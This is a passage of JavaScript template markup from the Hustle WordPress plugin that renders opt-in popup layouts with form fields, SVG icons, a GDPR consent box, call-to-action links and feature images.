viewBox="0 0 12 13" preserveAspectRatio="none" class="hustle-icon hustle-i_text"><path fill-rule="evenodd" d="M7 10.928v-9.25h3l1 2.25h1l-.188-3.01c-.034-.547-.5-.955-1.062-.915 0 0-1.875.175-4.75.175S1.25.003 1.25.003C.698-.04.222.37.188.917L0 3.927h1l1-2.25h3v9.25l-2 1v1l3-.25 3 .25v-1l-2-1z"/></svg> <# } #> <# if ( 'number' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="13" height="13" viewBox="0 0 13 13" preserveAspectRatio="none" class="hustle-icon hustle-i_number"><path fill-rule="evenodd" d="M3 8V5H1c-.553 0-1-.444-1-1 0-.552.447-1 1-1h2V1c0-.553.444-1 1-1 .552 0 1 .447 1 1v2h3V1c0-.553.444-1 1-1 .552 0 1 .447 1 1v2h2c.553 0 1 .444 1 1 0 .552-.447 1-1 1h-2v3h2c.553 0 1 .444 1 1 0 .552-.447 1-1 1h-2v2c0 .553-.444 1-1 1-.552 0-1-.447-1-1v-2H5v2c0 .553-.444 1-1 1-.552 0-1-.447-1-1v-2H1c-.553 0-1-.444-1-1 0-.552.447-1 1-1h2zm2 0h3V5H5v3z"/></svg> <# } #> <# if ( 'url' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="13" viewBox="0 0 16 13" preserveAspectRatio="none" class="hustle-icon hustle-i_url"><path fill-rule="evenodd" d="M0 2.003C0 .897.895 0 1.994 0h12.012C15.106 0 16 .894 16 2.003v8.994C16 12.103 15.105 13 14.006 13H1.994C.894 13 0 12.106 0 10.997V2.003zm1 0v8.994c0 .557.445 1.003.994 1.003h12.012c.547 0 .994-.45.994-1.003V2.003C15 1.446 14.555 1 14.006 1H1.994C1.447 1 1 1.45 1 2.003zm7 5.33V9H7V4h2c.557 0 1 .447 1 1v1c0 .557-.447 1-1 1h-.2L10 9H9L8 7.333zM8 5h.495c.28 0 .505.232.505.5 0 .276-.214.5-.505.5H8V5zM4.5 8c.268 0 .5-.22.5-.49V4h1v3.5C6 8.326 5.328 9 4.5 9 3.666 9 3 8.328 3 7.5V4h1v3.51c0 .275.224.49.5.49zM12 8h1v1h-1c-.556 0-1-.448-1-1V4h1v4z"/></svg> <# } #> <# if( _.isTrue( element.required ) ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 18 18" preserveAspectRatio="none" class="hustle-icon hustle-i_warning" style="display:none"><path fill-rule="evenodd" d="M9 18c-4.97 0-9-4.03-9-9s4.03-9 9-9 9 4.03 9 9-4.03 9-9 9zm.25-3c.69 0 1.25-.56 1.25-1.25s-.56-1.25-1.25-1.25S8 13.06 8 13.75 8.56 15 9.25 15zm-.018-4C8 11 7 3.5 9.232 3.5s1.232 7.5 0 7.5z"/></svg> <# } #> </span> <# } #> <span class="hustle-modal-optin_placeholder">{{ element.placeholder }}</span> </label> </div> <# } #> <# }); #> <# } #> <# if ( _.isTrue( have_mc_group ) && 'hidden' !== content.args.group.type ) { #></div><# } #> <# if ( _.isTrue( has_args ) ) { #><div class="hustle-modal-provider-args-container"></div><# } #> <# if ( 'undefined' !== typeof content.form_elements.submit && 'undefined' !== typeof content.form_elements.submit.label ) { #> <div class="hustle-modal-optin_button"> <button type="submit"> <span class="hustle-loading-text">{{ content.form_elements.submit.label }}</span> <span class="hustle-loading-icon"></span> </button> </div> <# } #> </form> <# if ( _.isTrue(content.show_gdpr) && '' !== content.gdpr_message ) { #> <div class="hustle-gdpr-box"> <label for="hustle-modal-gdpr-{{{module_id}}}" class="hustle-gdpr-checkbox"> <input type="checkbox" id="hustle-modal-gdpr-{{{module_id}}}" class="hustle-modal-gdpr"> <span aria-hidden="true"></span> </label> <div for="hustle-modal-gdpr-{{{module_id}}}" class="hustle-gdpr-content">{{{ content.gdpr_message }}}</div> </div> <# } #> <# if ( show_recaptcha ) { #> <# } #> </footer> <# } #> <# if ( 'two' === design.form_layout ) { #> <# if ( 'left' === design.feature_image_position && _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) { #> <div class="hustle-modal-image hustle-modal-image_{{ design.feature_image_fit }}<# if ( _.isTrue(content.feature_image_hide_on_mobile) ) { #> hustle-modal-mobile_hidden<# } #>"> <# if ( 'contain' === design.feature_image_fit || 'cover' === design.feature_image_fit ) { #> <# if ( 'custom' !== design.feature_image_horizontal || 'custom' !== design.feature_image_vertical ) { #> <img src="{{ content.feature_image }}" class="hustle-modal-image_{{ design.feature_image_horizontal }}{{ design.feature_image_vertical }}"> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> </div> <# } #> <div class="hustle-modal-content"> <# if ( ( _.isTrue( content.has_title ) && ( '' !== content.title || '' !== content.sub_title ) ) || '' !== content.main_content || ( _.isTrue( content.show_cta ) && ( '' !== content.cta_label && '' !== content.cta_url ) ) ) { #> <section> <article> <div class="hustle-modal-article"> <# if ( _.isTrue( content.has_title ) && ( '' !== content.title || '' !== content.sub_title ) ) { #> <hgroup> <# if ( '' !== content.title ) { #> <h1 class="hustle-modal-title">{{ content.title }}</h1> <# } #> <# if ( '' !== content.sub_title ) { #> <h2 class="hustle-modal-subtitle">{{ content.sub_title }}</h2> <# } #> </hgroup> <# } #> {{{ content.main_content }}} <# if ( _.isTrue( content.show_cta ) && ( '' !== content.cta_label && '' !== content.cta_url ) ) { #> <div class="hustle-modal-footer"> <a target="_{{ content.cta_target }}" href="{{ content.cta_url }}" class="hustle-modal-cta">{{ content.cta_label }}</a> </div> <# } #> </div> </article> </section> <# } #> <footer> <form class="hustle-modal-optin_form {{ ( _.isTrue(have_mc_group) && 'hidden' !== content.args.group.type ) ? 'hustle-modal-optin_groups' : '' }} {{ ( 'separated' === design.form_fields_proximity ) ? 'hustle-modal-optin_separated' : '' }}" role="form"> <# if ( _.isTrue( have_mc_group ) && 'hidden' !== content.args.group.type ) { #><div class="hustle-modal-optin_group"><# } #> <# if ( 'undefined' !== typeof content.form_elements && !_.isEmpty( content.form_elements ) ) { #> <# _.each( content.form_elements, function( element, key ) { var element_type = element.type.toLowerCase(); if ( 'recaptcha' === element_type ) { show_recaptcha = true; return; } if ( 'name' === element_type || 'address' === element_type || 'phone' === element_type ) { var input_type = 'text'; } else { var input_type = element_type; } #> <# if ( 'submit' !== key ) { #> <div class="hustle-modal-optin_field {{ ( 'none' !== design.form_fields_icon ) ? 'hustle-modal-field_with_icon' : '' }}"> <input name="{{key}}" class="{{ ( _.isTrue( element.required ) ) ? 'required' : '' }}" type="{{input_type}}" data-error="Please, provide {{element.label.toLowerCase()}}."> <label> <# if ( "none" !== design.form_fields_icon ) { #> <span class="hustle-modal-optin_icon{{ ( 'animated' === design.form_fields_icon ) ? ' hustle-modal-optin_animated' : '' }}"> <# if ( 'email' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="14" height="11" viewBox="0 0 14 11" preserveAspectRatio="none" class="hustle-icon hustle-i_email"><path fill-rule="evenodd" d="M.206 1.112L7 7l6.793-5.887c.132.266.207.564.207.88v7.015c0 1.1-.897 1.992-2.006 1.992H2.006C.898 11 0 10.1 0 9.008V1.992c0-.316.074-.615.206-.88zM.94.305C1.247.112 1.613 0 2.005 0h9.988c.392 0 .757.112 1.066.306L7 5.5.94.305z"/></svg> <# } #> <# if ( 'name' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="11" height="14" viewBox="0 0 11 14" preserveAspectRatio="none" class="hustle-icon hustle-i_user"><path fill-rule="evenodd" d="M1.632 6.785c.917 1.118 2.31 1.83 3.868 1.83 1.56 0 2.95-.712 3.868-1.83C10.376 7.533 11 8.787 11 10.8c0 2-2.75 2.5-5.5 2.5S0 12.8 0 10.8c0-2.013.624-3.267 1.632-4.015zM5.5 7C3.567 7 2 5.433 2 3.5S3.567 0 5.5 0 9 1.567 9 3.5 7.433 7 5.5 7z"/></svg> <# } #> <# if ( 'address' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="10" height="15" viewBox="0 0 10 15" preserveAspectRatio="none" class="hustle-icon hustle-i_pin"><path fill-rule="evenodd" d="M5 0c2.442 0 5 1 5 4.5S6.178 12.904 5 15C3.805 12.904 0 8 0 4.5S2.54 0 5 0zm0 6.5c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2z"/></svg> <# } #> <# if ( 'phone' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="14" height="14" viewBox="0 0 14 14" preserveAspectRatio="none" class="hustle-icon hustle-i_phone"><path fill-rule="evenodd" d="M9.947 13.855s-2.94-1.157-5.795-4.01C1.3 6.99.14 4.046.14 4.046c-.28-.605-.125-1.48.347-1.953L2.38.204c.314-.316.746-.258.964.13l1.63 2.91c.218.39.14.96-.177 1.276l-.614.613s.903 1.495 2.044 2.637c1.142 1.14 2.58 1.986 2.58 1.986l.613-.613c.316-.316.886-.394 1.274-.174l2.968 1.68c.388.22.448.652.132.968l-1.892 1.89c-.473.475-1.35.638-1.955.347z"/></svg> <# } #> <# if ( 'text' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="12" height="13" viewBox="0 0 12 13" preserveAspectRatio="none" class="hustle-icon hustle-i_text"><path fill-rule="evenodd" d="M7 10.928v-9.25h3l1 2.25h1l-.188-3.01c-.034-.547-.5-.955-1.062-.915 0 0-1.875.175-4.75.175S1.25.003 1.25.003C.698-.04.222.37.188.917L0 3.927h1l1-2.25h3v9.25l-2 1v1l3-.25 3 .25v-1l-2-1z"/></svg> <# } #> <# if ( 'number' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="13" height="13" viewBox="0 0 13 13" preserveAspectRatio="none" class="hustle-icon hustle-i_number"><path fill-rule="evenodd" d="M3 8V5H1c-.553 0-1-.444-1-1 0-.552.447-1 1-1h2V1c0-.553.444-1 1-1 .552 0 1 .447 1 1v2h3V1c0-.553.444-1 1-1 .552 0 1 .447 1 1v2h2c.553 0 1 .444 1 1 0 .552-.447 1-1 1h-2v3h2c.553 0 1 .444 1 1 0 .552-.447 1-1 1h-2v2c0 .553-.444 1-1 1-.552 0-1-.447-1-1v-2H5v2c0 .553-.444 1-1 1-.552 0-1-.447-1-1v-2H1c-.553 0-1-.444-1-1 0-.552.447-1 1-1h2zm2 0h3V5H5v3z"/></svg> <# } #> <# if ( 'url' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="13" viewBox="0 0 16 13" preserveAspectRatio="none" class="hustle-icon hustle-i_url"><path fill-rule="evenodd" d="M0 2.003C0 .897.895 0 1.994 0h12.012C15.106 0 16 .894 16 2.003v8.994C16 12.103 15.105 13 14.006 13H1.994C.894 13 0 12.106 0 10.997V2.003zm1 0v8.994c0 .557.445 1.003.994 1.003h12.012c.547 0 .994-.45.994-1.003V2.003C15 1.446 14.555 1 14.006 1H1.994C1.447 1 1 1.45 1 2.003zm7 5.33V9H7V4h2c.557 0 1 .447 1 1v1c0 .557-.447 1-1 1h-.2L10 9H9L8 7.333zM8 5h.495c.28 0 .505.232.505.5 0 .276-.214.5-.505.5H8V5zM4.5 8c.268 0 .5-.22.5-.49V4h1v3.5C6 8.326 5.328 9 4.5 9 3.666 9 3 8.328 3 7.5V4h1v3.51c0 .275.224.49.5.49zM12 8h1v1h-1c-.556 0-1-.448-1-1V4h1v4z"/></svg> <# } #> <# if( _.isTrue( element.required ) ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 18 18" preserveAspectRatio="none" class="hustle-icon hustle-i_warning" style="display:none"><path fill-rule="evenodd" d="M9 18c-4.97 0-9-4.03-9-9s4.03-9 9-9 9 4.03 9 9-4.03 9-9 9zm.25-3c.69 0 1.25-.56 1.25-1.25s-.56-1.25-1.25-1.25S8 13.06 8 13.75 8.56 15 9.25 15zm-.018-4C8 11 7 3.5 9.232 3.5s1.232 7.5 0 7.5z"/></svg> <# } #> </span> <# } #> <span class="hustle-modal-optin_placeholder">{{ element.placeholder }}</span> </label> </div> <# } #> <# }); #> <# } #> <# if ( _.isTrue( have_mc_group ) && 'hidden' !== content.args.group.type ) { #></div><# } #> <# if ( _.isTrue( has_args ) ) { #><div class="hustle-modal-provider-args-container"></div><# } #> <# if ( 'undefined' !== typeof content.form_elements.submit && 'undefined' !== typeof content.form_elements.submit.label ) { #> <div class="hustle-modal-optin_button"> <button type="submit"> <span class="hustle-loading-text">{{ content.form_elements.submit.label }}</span> <span class="hustle-loading-icon"></span> </button> </div> <# } #> </form> <# if ( _.isTrue(content.show_gdpr) && '' !== content.gdpr_message ) { #> <div class="hustle-gdpr-box"> <label for="hustle-modal-gdpr-{{{module_id}}}" class="hustle-gdpr-checkbox"> <input type="checkbox" id="hustle-modal-gdpr-{{{module_id}}}" class="hustle-modal-gdpr"> <span aria-hidden="true"></span> </label> <div for="hustle-modal-gdpr-{{{module_id}}}" class="hustle-gdpr-content">{{{ content.gdpr_message }}}</div> </div> <# } #> <# if ( show_recaptcha ) { #> <# } #> </footer> </div> <# if ( 'right' === design.feature_image_position && _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) { #> <div class="hustle-modal-image hustle-modal-image_{{ design.feature_image_fit }}<# if ( _.isTrue(content.feature_image_hide_on_mobile) ) { #> hustle-modal-mobile_hidden<# } #>"> <# if ( 'contain' === design.feature_image_fit || 'cover' === design.feature_image_fit ) { #> <# if ( 'custom' !== design.feature_image_horizontal || 'custom' !== design.feature_image_vertical ) { #> <img src="{{ content.feature_image }}" class="hustle-modal-image_{{ design.feature_image_horizontal }}{{ design.feature_image_vertical }}"> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> </div> <# } #> <# } #> <# if ( 'three' === design.form_layout ) { #> <# if ( 'right' === design.feature_image_position ) { #> <footer class="hustle-modal-optin_wrap"> <div class="hui-modal-footer-wrap"> <form class="hustle-modal-optin_form {{ ( _.isTrue(have_mc_group) && 'hidden' !== content.args.group.type ) ? 'hustle-modal-optin_groups' : '' }} {{ ( 'separated' === design.form_fields_proximity ) ? 'hustle-modal-optin_separated' : '' }}" role="form"> <# if ( _.isTrue( have_mc_group ) && 'hidden' !== content.args.group.type ) { #><div class="hustle-modal-optin_group"><# } #> <# if ( 'undefined' !== typeof content.form_elements && !_.isEmpty( content.form_elements ) ) { #> <# _.each( content.form_elements, function( element, key ) { var element_type = element.type.toLowerCase(); if ( 'recaptcha' === element_type ) { show_recaptcha = true; return; } if ( 'name' === element_type || 'address' === element_type || 'phone' === element_type ) { var input_type = 'text'; } else { var input_type = element_type; } #> <# if ( 'submit' !== key ) { #> <div class="hustle-modal-optin_field {{ ( 'none' !== design.form_fields_icon ) ? 'hustle-modal-field_with_icon' : '' }}"> <input name="{{key}}" class="{{ ( _.isTrue( element.required ) ) ? 'required' : '' }}" type="{{input_type}}" data-error="Please, provide {{element.label.toLowerCase()}}."> <label> <# if ( "none" !== design.form_fields_icon ) { #> <span class="hustle-modal-optin_icon{{ ( 'animated' === design.form_fields_icon ) ? ' hustle-modal-optin_animated' : '' }}"> <# if ( 'email' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="14" height="11" viewBox="0 0 14 11" preserveAspectRatio="none" class="hustle-icon hustle-i_email"><path fill-rule="evenodd" d="M.206 1.112L7 7l6.793-5.887c.132.266.207.564.207.88v7.015c0 1.1-.897 1.992-2.006 1.992H2.006C.898 11 0 10.1 0 9.008V1.992c0-.316.074-.615.206-.88zM.94.305C1.247.112 1.613 0 2.005 0h9.988c.392 0 .757.112 1.066.306L7 5.5.94.305z"/></svg> <# } #> <# if ( 'name' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="11" height="14" viewBox="0 0 11 14" preserveAspectRatio="none" class="hustle-icon hustle-i_user"><path fill-rule="evenodd" d="M1.632 6.785c.917 1.118 2.31 1.83 3.868 1.83 1.56 0 2.95-.712 3.868-1.83C10.376 7.533 11 8.787 11 10.8c0 2-2.75 2.5-5.5 2.5S0 12.8 0 10.8c0-2.013.624-3.267 1.632-4.015zM5.5 7C3.567 7 2 5.433 2 3.5S3.567 0 5.5 0 9 1.567 9 3.5 7.433 7 5.5 7z"/></svg> <# } #> <# if ( 'address' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="10" height="15" viewBox="0 0 10 15" preserveAspectRatio="none" class="hustle-icon hustle-i_pin"><path fill-rule="evenodd" d="M5 0c2.442 0 5 1 5 4.5S6.178 12.904 5 15C3.805 12.904 0 8 0 4.5S2.54 0 5 0zm0 6.5c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2z"/></svg> <# } #> <# if ( 'phone' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="14" height="14" viewBox="0 0 14 14" preserveAspectRatio="none" class="hustle-icon hustle-i_phone"><path fill-rule="evenodd" d="M9.947 13.855s-2.94-1.157-5.795-4.01C1.3 6.99.14 4.046.14 4.046c-.28-.605-.125-1.48.347-1.953L2.38.204c.314-.316.746-.258.964.13l1.63 2.91c.218.39.14.96-.177 1.276l-.614.613s.903 1.495 2.044 2.637c1.142 1.14 2.58 1.986 2.58 1.986l.613-.613c.316-.316.886-.394 1.274-.174l2.968 1.68c.388.22.448.652.132.968l-1.892 1.89c-.473.475-1.35.638-1.955.347z"/></svg> <# } #> <# if ( 'text' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="12" height="13" viewBox="0 0 12 13" preserveAspectRatio="none" class="hustle-icon hustle-i_text"><path fill-rule="evenodd" d="M7 10.928v-9.25h3l1 2.25h1l-.188-3.01c-.034-.547-.5-.955-1.062-.915 0 0-1.875.175-4.75.175S1.25.003 1.25.003C.698-.04.222.37.188.917L0 3.927h1l1-2.25h3v9.25l-2 1v1l3-.25 3 .25v-1l-2-1z"/></svg> <# } #> <# if ( 'number' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="13" height="13" viewBox="0 0 13 13" preserveAspectRatio="none" class="hustle-icon hustle-i_number"><path fill-rule="evenodd" d="M3 8V5H1c-.553 0-1-.444-1-1 0-.552.447-1 1-1h2V1c0-.553.444-1 1-1 .552 0 1 .447 1 1v2h3V1c0-.553.444-1 1-1 .552 0 1 .447 1 1v2h2c.553 0 1 .444 1 1 0 .552-.447 1-1 1h-2v3h2c.553 0 1 .444 1 1 0 .552-.447 1-1 1h-2v2c0 .553-.444 1-1 1-.552 0-1-.447-1-1v-2H5v2c0 .553-.444 1-1 1-.552 0-1-.447-1-1v-2H1c-.553 0-1-.444-1-1 0-.552.447-1 1-1h2zm2 0h3V5H5v3z"/></svg> <# } #> <# if ( 'url' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="13" viewBox="0 0 16 13" preserveAspectRatio="none" class="hustle-icon hustle-i_url"><path fill-rule="evenodd" d="M0 2.003C0 .897.895 0 1.994 0h12.012C15.106 0 16 .894 16 2.003v8.994C16 12.103 15.105 13 14.006 13H1.994C.894 13 0 12.106 0 10.997V2.003zm1 0v8.994c0 .557.445 1.003.994 1.003h12.012c.547 0 .994-.45.994-1.003V2.003C15 1.446 14.555 1 14.006 1H1.994C1.447 1 1 1.45 1 2.003zm7 5.33V9H7V4h2c.557 0 1 .447 1 1v1c0 .557-.447 1-1 1h-.2L10 9H9L8 7.333zM8 5h.495c.28 0 .505.232.505.5 0 .276-.214.5-.505.5H8V5zM4.5 8c.268 0 .5-.22.5-.49V4h1v3.5C6 8.326 5.328 9 4.5 9 3.666 9 3 8.328 3 7.5V4h1v3.51c0 .275.224.49.5.49zM12 8h1v1h-1c-.556 0-1-.448-1-1V4h1v4z"/></svg> <# } #> <# if( _.isTrue( element.required ) ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 18 18" preserveAspectRatio="none" class="hustle-icon hustle-i_warning" style="display:none"><path fill-rule="evenodd" d="M9 18c-4.97 0-9-4.03-9-9s4.03-9 9-9 9 4.03 9 9-4.03 9-9 9zm.25-3c.69 0 1.25-.56 1.25-1.25s-.56-1.25-1.25-1.25S8 13.06 8 13.75 8.56 15 9.25 15zm-.018-4C8 11 7 3.5 9.232 3.5s1.232 7.5 0 7.5z"/></svg> <# } #> </span> <# } #> <span class="hustle-modal-optin_placeholder">{{ element.placeholder }}</span> </label> </div> <# } #> <# }); #> <# } #> <# if ( _.isTrue( have_mc_group ) && 'hidden' !== content.args.group.type ) { #></div><# } #> <# if ( _.isTrue( has_args ) ) { #><div class="hustle-modal-provider-args-container"></div><# } #> <# if ( 'undefined' !== typeof content.form_elements.submit && 'undefined' !== typeof content.form_elements.submit.label ) { #> <div class="hustle-modal-optin_button"> <button type="submit"> <span class="hustle-loading-text">{{ content.form_elements.submit.label }}</span> <span class="hustle-loading-icon"></span> </button> </div> <# } #> </form> <# if ( _.isTrue(content.show_gdpr) && '' !== content.gdpr_message ) { #> <div class="hustle-gdpr-box"> <label for="hustle-modal-gdpr-{{{module_id}}}" class="hustle-gdpr-checkbox"> <input type="checkbox" id="hustle-modal-gdpr-{{{module_id}}}" class="hustle-modal-gdpr"> <span aria-hidden="true"></span> </label> <div for="hustle-modal-gdpr-{{{module_id}}}" class="hustle-gdpr-content">{{{ content.gdpr_message }}}</div> </div> <# } #> </div> <# if ( show_recaptcha ) { #> <# } #> </footer> <# } #> <# if ( ( _.isTrue( content.has_title ) && ( '' !== content.title || '' !== content.sub_title ) ) || '' !== content.main_content || ( _.isTrue( content.show_cta ) && ( '' !== content.cta_label && '' !== content.cta_url ) ) || ( _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) ) { #> <section> <# if ( _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) { #> <div class="hustle-modal-image hustle-modal-image_{{ design.feature_image_fit }}<# if ( _.isTrue(content.feature_image_hide_on_mobile) ) { #> hustle-modal-mobile_hidden<# } #>"> <# if ( 'contain' === design.feature_image_fit || 'cover' === design.feature_image_fit ) { #> <# if ( 'custom' !== design.feature_image_horizontal || 'custom' !== design.feature_image_vertical ) { #> <img src="{{ content.feature_image }}" class="hustle-modal-image_{{ design.feature_image_horizontal }}{{ design.feature_image_vertical }}"> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> </div> <# } #> <# if ( ( _.isTrue( content.has_title ) && ( '' !== content.title || '' !== content.sub_title ) ) || '' !== content.main_content || ( _.isTrue( content.show_cta ) && '' !== content.cta_label ) ) { #> <article> <div class="hustle-modal-article"> <# if ( _.isTrue( content.has_title ) && ( '' !== content.title || '' !== content.sub_title ) ) { #> <hgroup> <# if ( '' !== content.title ) { #> <h1 class="hustle-modal-title">{{ content.title }}</h1> <# } #> <# if ( '' !== content.sub_title ) { #> <h2 class="hustle-modal-subtitle">{{ content.sub_title }}</h2> <# } #> </hgroup> <# } #> {{{ content.main_content }}} <# if ( _.isTrue( content.show_cta ) && ( '' !== content.cta_label && '' !== content.cta_url ) ) { #> <div class="hustle-modal-footer"> <a target="_{{ content.cta_target }}" href="{{ content.cta_url }}" class="hustle-modal-cta">{{ content.cta_label }}</a> </div> <# } #> </div> </article> <# } #> </section> <# } #> <# if ( 'left' === design.feature_image_position ) { #> <footer class="hustle-modal-optin_wrap"> <div class="hui-modal-footer-wrap"> <form class="hustle-modal-optin_form {{ ( _.isTrue(have_mc_group) && 'hidden' !== content.args.group.type ) ? 'hustle-modal-optin_groups' : '' }} {{ ( 'separated' === design.form_fields_proximity ) ? 'hustle-modal-optin_separated' : '' }}" role="form"> <# if ( _.isTrue( have_mc_group ) && 'hidden' !== content.args.group.type ) { #><div class="hustle-modal-optin_group"><# } #> <# if ( 'undefined' !== typeof content.form_elements && !_.isEmpty( content.form_elements ) ) { #> <# _.each( content.form_elements, function( element, key ) { var element_type = element.type.toLowerCase(); if ( 'recaptcha' === element_type ) { show_recaptcha = true; return; } if ( 'name' === element_type || 'address' === element_type || 'phone' === element_type ) { var input_type = 'text'; } else { var input_type = element_type; } #> <# if ( 'submit' !== key ) { #> <div class="hustle-modal-optin_field {{ ( 'none' !== design.form_fields_icon ) ? 'hustle-modal-field_with_icon' : '' }}"> <input name="{{key}}" class="{{ ( _.isTrue( element.required ) ) ? 'required' : '' }}" type="{{input_type}}" data-error="Please, provide {{element.label.toLowerCase()}}."> <label> <# if ( "none" !== design.form_fields_icon ) { #> <span class="hustle-modal-optin_icon{{ ( 'animated' === design.form_fields_icon ) ? ' hustle-modal-optin_animated' : '' }}"> <# if ( 'email' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="14" height="11" viewBox="0 0 14 11" preserveAspectRatio="none" class="hustle-icon hustle-i_email"><path fill-rule="evenodd" d="M.206 1.112L7 7l6.793-5.887c.132.266.207.564.207.88v7.015c0 1.1-.897 1.992-2.006 1.992H2.006C.898 11 0 10.1 0 9.008V1.992c0-.316.074-.615.206-.88zM.94.305C1.247.112 1.613 0 2.005 0h9.988c.392 0 .757.112 1.066.306L7 5.5.94.305z"/></svg> <# } #> <# if ( 'name' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="11" height="14" viewBox="0 0 11 14" preserveAspectRatio="none" class="hustle-icon hustle-i_user"><path fill-rule="evenodd" d="M1.632 6.785c.917 1.118 2.31 1.83 3.868 1.83 1.56 0 2.95-.712 3.868-1.83C10.376 7.533 11 8.787 11 10.8c0 2-2.75 2.5-5.5 2.5S0 12.8 0 10.8c0-2.013.624-3.267 1.632-4.015zM5.5 7C3.567 7 2 5.433 2 3.5S3.567 0 5.5 0 9 1.567 9 3.5 7.433 7 5.5 7z"/></svg> <# } #> <# if ( 'address' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="10" height="15" viewBox="0 0 10 15" preserveAspectRatio="none" class="hustle-icon hustle-i_pin"><path fill-rule="evenodd" d="M5 0c2.442 0 5 1 5 4.5S6.178 12.904 5 15C3.805 12.904 0 8 0 4.5S2.54 0 5 0zm0 6.5c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2z"/></svg> <# } #> <# if ( 'phone' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="14" height="14" viewBox="0 0 14 14" preserveAspectRatio="none" class="hustle-icon hustle-i_phone"><path fill-rule="evenodd" d="M9.947 13.855s-2.94-1.157-5.795-4.01C1.3 6.99.14 4.046.14 4.046c-.28-.605-.125-1.48.347-1.953L2.38.204c.314-.316.746-.258.964.13l1.63 2.91c.218.39.14.96-.177 1.276l-.614.613s.903 1.495 2.044 2.637c1.142 1.14 2.58 1.986 2.58 1.986l.613-.613c.316-.316.886-.394 1.274-.174l2.968 1.68c.388.22.448.652.132.968l-1.892 1.89c-.473.475-1.35.638-1.955.347z"/></svg> <# } #> <# if ( 'text' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="12" height="13" viewBox="0 0 12 13" preserveAspectRatio="none" class="hustle-icon hustle-i_text"><path fill-rule="evenodd" d="M7 10.928v-9.25h3l1 2.25h1l-.188-3.01c-.034-.547-.5-.955-1.062-.915 0 0-1.875.175-4.75.175S1.25.003 1.25.003C.698-.04.222.37.188.917L0 3.927h1l1-2.25h3v9.25l-2 1v1l3-.25 3 .25v-1l-2-1z"/></svg> <# } #> <# if ( 'number' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="13" height="13" viewBox="0 0 13 13" preserveAspectRatio="none" class="hustle-icon hustle-i_number"><path fill-rule="evenodd" d="M3 8V5H1c-.553 0-1-.444-1-1 0-.552.447-1 1-1h2V1c0-.553.444-1 1-1 .552 0 1 .447 1 1v2h3V1c0-.553.444-1 1-1 .552 0 1 .447 1 1v2h2c.553 0 1 .444 1 1 0 .552-.447 1-1 1h-2v3h2c.553 0 1 .444 1 1 0 .552-.447 1-1 1h-2v2c0 .553-.444 1-1 1-.552 0-1-.447-1-1v-2H5v2c0 .553-.444 1-1 1-.552 0-1-.447-1-1v-2H1c-.553 0-1-.444-1-1 0-.552.447-1 1-1h2zm2 0h3V5H5v3z"/></svg> <# } #> <# if ( 'url' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="13" viewBox="0 0 16 13" preserveAspectRatio="none" class="hustle-icon hustle-i_url"><path fill-rule="evenodd" d="M0 2.003C0 .897.895 0 1.994 0h12.012C15.106 0 16 .894 16 2.003v8.994C16 12.103 15.105 13 14.006 13H1.994C.894 13 0 12.106 0 10.997V2.003zm1 0v8.994c0 .557.445 1.003.994 1.003h12.012c.547 0 .994-.45.994-1.003V2.003C15 1.446 14.555 1 14.006 1H1.994C1.447 1 1 1.45 1 2.003zm7 5.33V9H7V4h2c.557 0 1 .447 1 1v1c0 .557-.447 1-1 1h-.2L10 9H9L8 7.333zM8 5h.495c.28 0 .505.232.505.5 0 .276-.214.5-.505.5H8V5zM4.5 8c.268 0 .5-.22.5-.49V4h1v3.5C6 8.326 5.328 9 4.5 9 3.666 9 3 8.328 3 7.5V4h1v3.51c0 .275.224.49.5.49zM12 8h1v1h-1c-.556 0-1-.448-1-1V4h1v4z"/></svg> <# } #> <# if( _.isTrue( element.required ) ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 18 18" preserveAspectRatio="none" class="hustle-icon hustle-i_warning" style="display:none"><path fill-rule="evenodd" d="M9 18c-4.97 0-9-4.03-9-9s4.03-9 9-9 9 4.03 9 9-4.03 9-9 9zm.25-3c.69 0 1.25-.56 1.25-1.25s-.56-1.25-1.25-1.25S8 13.06 8 13.75 8.56 15 9.25 15zm-.018-4C8 11 7 3.5 9.232 3.5s1.232 7.5 0 7.5z"/></svg> <# } #> </span> <# } #> <span class="hustle-modal-optin_placeholder">{{ 